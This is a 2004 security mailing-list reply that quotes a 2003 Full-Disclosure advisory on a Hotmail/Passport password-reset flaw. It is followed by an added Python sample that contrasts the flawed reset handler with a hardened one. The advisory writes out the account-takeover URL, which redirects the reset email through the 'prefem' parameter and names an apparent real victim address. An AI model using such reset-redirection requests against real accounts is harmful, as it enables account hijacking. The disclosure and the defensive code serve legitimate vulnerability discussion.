Open Source and information security mailing list archives
Message-ID: <20040421064738.84731.qmail@web8002.mail.in.yahoo.com>
From: bhattsharma at yahoo.co.in (anirudh bhatt)
Subject: Re: Hotmail & Passport (.NET Accounts) Vulnerability

Isn't this the same vulnerability which was first
reported on FD (almost a year ago..) ..and supposedly
made FD "famous" (as regards being noticed by the
press)?


> I am forwarding this as it may impact people who depend on MSN or
> passport systems for business reasons. Contrary to what at least one
> of the full-disclosure follow-ups reports, it does work.
> 
> D
> 
> 
> ---------- Forwarded message ----------
> Date: Wed, 7 May 2003 19:50:51 -0700 (PDT)
> From: Muhammad Faisal Rauf Danka
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability
> 
> Hotmail & Passport (.NET Accounts) Vulnerability
> 
> There is a very serious and stupid vulnerability or bad coding in
> Hotmail / Passport's (.NET Accounts)
> 
> I tried sending emails several times to Hotmail / Passport contact
> addresses, but always met with the NLP bots.
> 
> I guess I don't need to go in details of how crucial and important
> Hotmail / Passport's .NET Account passport is to anyone.
> 
> You name it and they have it, E-Commerce, Credit Card processing,
> Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers
> and what not.
> 
> It is so simple that it is funny.
> 
> All you got to do is hit the following in your browser:
> 
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=vanecarolina13@hotmail.com&id=&cb=&prefem=careverga7@.com&rst=1
> 
> And you'll get an email on attacker@...acker.com asking you to click
> on a url something like this:
> 
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033
> 
> From that url, you can reset the password and I don't think I need to
> say anything more about it.
> 
> Vulnerability / Flaw discovered : 12th April 2003
> Vendor / Owner notified : Yes (as far as emailing them more than 10
> times is concerned)
> 
> 
> Regards
> --------
> Muhammad Faisal Rauf Danka
> 


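The flaw reported in the quoted advisory, modelled server-side next to a hardened handler; this is an added example, not part of the original thread and not Passport's code. The parameter names `em` and `prefem` come from the URL in the advisory; the account data, token store and function names are hypothetical.

```python
import hashlib
import secrets
import time

# Constructed sample data: account -> recovery address stored at sign-up.
ACCOUNTS = {"victim@example.com": "victim-alt@example.org"}
TOKENS = {}       # sha256(token) -> (account, expiry); hypothetical in-memory store
TOKEN_TTL = 900   # seconds a reset token stays valid (assumed value)

def reset_destination_flawed(params):
    """Model of the reported behaviour: the request chooses where the link goes."""
    if params.get("em") not in ACCOUNTS:
        return None
    return params.get("prefem") or ACCOUNTS[params["em"]]

def reset_destination_hardened(params):
    """Destination comes only from the account record; 'prefem' is ignored."""
    return ACCOUNTS.get(params.get("em"))

def issue_reset(params, now=None):
    """Return (destination, token), or None for an unknown account."""
    now = time.time() if now is None else now
    dest = reset_destination_hardened(params)
    if dest is None:
        return None
    token = secrets.token_urlsafe(32)
    # Store only a hash so a leaked token table cannot be replayed directly.
    digest = hashlib.sha256(token.encode()).hexdigest()
    TOKENS[digest] = (params["em"], now + TOKEN_TTL)
    return dest, token

def redeem_reset(token, now=None):
    """Return the account the token resets, or None if unknown, used or expired."""
    now = time.time() if now is None else now
    digest = hashlib.sha256(token.encode()).hexdigest()
    entry = TOKENS.pop(digest, None)   # pop makes the token single-use
    if entry is None or now > entry[1]:
        return None
    return entry[0]
```
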

